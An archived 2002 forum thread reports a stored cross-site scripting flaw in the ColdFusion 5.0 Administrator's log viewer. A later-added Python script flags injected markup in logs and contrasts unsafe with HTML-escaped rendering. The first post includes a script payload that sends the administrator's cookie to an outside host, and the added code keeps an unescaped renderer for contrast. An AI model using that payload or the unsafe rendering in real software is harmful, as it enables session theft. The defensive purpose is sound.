
View Full Version : Cross-site scripting vulnerability in CF 5.0



KiLL CoLe
16/12/02, 21:34
Cross-site scripting vulnerability in CF 5.0. This
issue was brought up to Macromedia on July 22nd, 2002.
Macromedia issued a fix to me, but I have not seen the
fix available to the public. The ColdFusion
Administrator allows you to view your application log
via your web browser. Under certain conditions, it is
possible to remotely alter ColdFusion's application
log. Take the following code:

<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
SELECT * FROM Products
Where ProductId = #int(url.productid)#
</CFQUERY>

If the INT function encounters a value that is not
numeric, it throws an exception and writes the value
that was passed to application.log. Should an
unsuspecting administrator view the log file via their
web browser, script could be executed. Analyze this
code:
if url.productid (from the above example) were passed
in as:

<iframe name="frame1" width="0" height="0"></iframe>
<script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie="
+ document.cookie</script>

this would enable an attacker to steal the value of
the ColdFusion administrator's cookie. Decrypting the
ColdFusion admin's password is well documented, and
poses a mild to moderate threat to server security.

**NOTE: There are dozens of other functions that throw
exceptions similar to the INT function.


16/12/02, 22:06
Something to note:

The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file while it is open.

So it's generally better (and safer, with this cross-site scripting
problem that's been around for years) to view the log files via a text
viewer on the system.

By default, they're in c:\cfusion\log\*.log


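Both the mechanism in KiLL CoLe's post (an exception message carrying attacker-supplied markup lands in application.log and is later rendered by the browser-based log viewer) and the follow-up advice to review the log files on the system instead can be exercised with the script below. It is an added example, not code from either poster or from Macromedia. It assumes a CSV-style application.log layout (severity, thread, date, time, application, message, with quotes inside a field doubled), uses a constructed three-entry log that embeds the payload from the post, flags entries whose message contains HTML or script fragments with a heuristic regex, and contrasts a viewer that interpolates the message straight into HTML with one that HTML-encodes it on output. The field names, the regex and the command-line usage are assumptions for illustration.

```python
import csv
import html
import io
import re
import sys

# Constructed sample of an application.log after the int() exception from the
# post. The CSV-style layout (severity, thread, date, time, application,
# message, with quotes inside a field doubled) is an assumption for this
# example, not the documented CF 5 format.
SAMPLE_LOG = (
    '"Information","web-0","12/16/02","21:30:12","","Application started"\n'
    '"Error","web-0","12/16/02","21:31:05","",'
    '"Invalid parameter type. The value ""<iframe name=""frame1"" width=""0"" '
    'height=""0""></iframe><script>document.frame1.location='
    '""http://www.domain.com/index.cfm?stealcookie=""+document.cookie</script>"" '
    'cannot be converted to a number."\n'
    '"Error","web-0","12/16/02","21:32:40","",'
    '"Invalid parameter type. The value ""abc"" cannot be converted to a number."\n'
)

FIELDS = ("severity", "thread", "date", "time", "application", "message")

# Heuristic: a diagnostic message should never contain tags, inline event
# handlers or javascript: URLs. Anything that matches came from user input.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(script|iframe|img|object|embed|svg|body|style|meta|link)\b"
    r"|\son[a-z]+\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)


def parse_log(text):
    """Split CSV-style log text into one dict per entry."""
    entries = []
    for row in csv.reader(io.StringIO(text)):
        if row:
            entries.append(dict(zip(FIELDS, row)))
    return entries


def find_injected(entries):
    """Return (index, severity, matched fragment) for entries whose message
    carries HTML or script instead of plain text."""
    hits = []
    for i, entry in enumerate(entries):
        match = MARKUP_RE.search(entry.get("message", ""))
        if match:
            hits.append((i, entry["severity"], match.group(0)))
    return hits


def render_unsafe(entries):
    """What a viewer that drops the message straight into HTML produces: the
    logged payload comes back as live markup. Shown only for contrast."""
    rows = "".join(
        "<tr><td>%s</td><td>%s</td></tr>" % (entry["time"], entry["message"])
        for entry in entries
    )
    return "<table>%s</table>" % rows


def render_safe(entries):
    """Same viewer with every field HTML-encoded on output, so the payload is
    displayed as text and never executes in the administrator's browser."""
    rows = "".join(
        "<tr><td>%s</td><td>%s</td></tr>"
        % (html.escape(entry["time"], quote=True),
           html.escape(entry["message"], quote=True))
        for entry in entries
    )
    return "<table>%s</table>" % rows


def scan(text):
    """Parse a log, print flagged entries and return the hit list."""
    entries = parse_log(text)
    hits = find_injected(entries)
    for index, severity, fragment in hits:
        print("entry %d (%s): suspicious fragment %r" % (index, severity, fragment))
    print("%d of %d entries flagged" % (len(hits), len(entries)))
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. python cflogscan.py c:\cfusion\log\application.log (assumed path)
        with open(sys.argv[1], encoding="latin-1", errors="replace") as handle:
            scan(handle.read())
    else:
        scan(SAMPLE_LOG)
```

Run it with no arguments to scan the embedded sample, or pass a log path to triage a real file from the command line instead of the Administrator's viewer. The encoding in render_safe is the fix the viewer itself needs; validating url.productid before it reaches int() (or binding it as an integer with cfqueryparam) keeps the payload out of the log in the first place, but the viewer must still treat every log line as untrusted, because dozens of other functions can put user input into the same file.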